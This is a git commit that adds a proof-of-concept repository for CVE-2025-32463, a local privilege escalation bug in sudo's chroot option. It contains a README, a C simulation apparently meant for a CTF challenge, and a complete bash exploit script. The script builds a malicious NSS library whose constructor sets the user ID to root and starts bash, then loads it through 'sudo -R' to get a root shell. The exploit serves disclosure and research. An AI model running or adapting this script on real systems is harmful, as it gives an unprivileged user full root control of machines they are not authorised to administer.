commit a2edc57cb8554a17d09827ee5fb076499cfa0d2c Author: Rich Mirch Date: Thu Jul 3 15:40:10 2025 -0500 Add PoC for CVE-2025-32463 Sudo chroot EoP diff --git a/README.md b/README.md new file mode 100644 index 0000000..49e4e10 --- /dev/null +++ b/README.md @@ -0,0 +1,12 @@ +# CVE-2025-32463-sudo-chwoot +### PoC for CVE-2025-32463 - Sudo chroot Elevation of Privilege Vulnerability +- Original PoC [sudo-chwoot.sh](sudo-chwoot.sh) +- CTF Demo [chwoot-demo.c](chwoot-demo.c) + +#### Docs +- Write-up: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +- Advisory: https://www.sudo.ws/security/advisories/chroot_bug/ + + +#### Other PoCs +- Dockerized version https://github.com/pr0v3rbs/CVE-2025-32463_chwoot diff --git a/chwoot-demo.c b/chwoot-demo.c new file mode 100644 index 0000000..7ab000f --- /dev/null +++ b/chwoot-demo.c @@ -0,0 +1,26 @@ +/* + Description: Simulate behavior of CVE-2025-32463 - sudo EoP via chroot. + Possible future CTF challenge? :) + gcc -Wall -o chwoot-demo chwoot-demo.c + cp 4755 chwoot-demo + mv chwoot-demo /usr/bin + Then get a root shell as a low priv user +*/ +#include +#include +#include +#include +#include + +int main() { + chdir("/tmp/stage"); + int saved_root = open("/",O_RDONLY); + int saved_cwd = open(".",O_RDONLY); + chroot("/tmp/stage"); + chdir("/"); + gethostbyname("woot"); + fchdir(saved_root); + chroot("."); + fchdir(saved_cwd); + getgrnam("got root?"); +} diff --git a/sudo-chwoot.sh b/sudo-chwoot.sh new file mode 100644 index 0000000..c5bf028 --- /dev/null +++ b/sudo-chwoot.sh @@ -0,0 +1,27 @@ +#!/bin/bash +# sudo-chwoot.sh +# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch +# @ Stratascale Cyber Research Unit (CRU) +STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX) +cd ${STAGE?} || exit 1 + +cat > woot1337.c< +#include + +__attribute__((constructor)) void woot(void) { + setreuid(0,0); + setregid(0,0); + chdir("/"); + execl("/bin/bash", "/bin/bash", NULL); +} +EOF + +mkdir -p woot/etc libnss_ +echo "passwd: /woot1337" > woot/etc/nsswitch.conf +cp /etc/group woot/etc +gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c + +echo "woot!" +sudo -R woot woot +rm -rf ${STAGE?}